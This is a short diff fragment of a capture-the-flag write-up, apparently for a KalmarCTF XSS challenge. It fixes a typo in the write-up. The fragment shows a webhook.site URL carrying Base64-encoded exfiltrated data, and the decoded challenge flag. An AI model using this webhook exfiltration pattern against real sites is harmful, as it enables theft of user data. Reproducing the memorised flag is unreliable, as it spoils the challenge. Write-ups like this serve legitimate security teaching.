MQCybersec/mqcybersec-website/src/content/writeups/25-kalmar-dnsxssoverhttp.md

 https://webhook.site/...?ZmxhZz1rYWxtYXJ7dGhhdF9jb250ZW50X3R5cGVfaGVhZGVyX2lzX2RvaW5nX3NvbWVfaGVhdnlfbGlmdGluZyFfZGlkX3lvdV91c2VfZG5zLXF1ZXJ5X29yX3Jlc29sdmU/fQ==
 ```

-We can then Base64 decode that string (CyberChef, Dcode.fr, `bsae64` util, whatever) to get the flag
+We can then Base64 decode that string (CyberChef, Dcode.fr, `base64` util, whatever) to get the flag.
 ```
 flag=kalmar{that_content_type_header_is_doing_some_heavy_lifting!_did_you_use_dns-query_or_resolve?}
 ```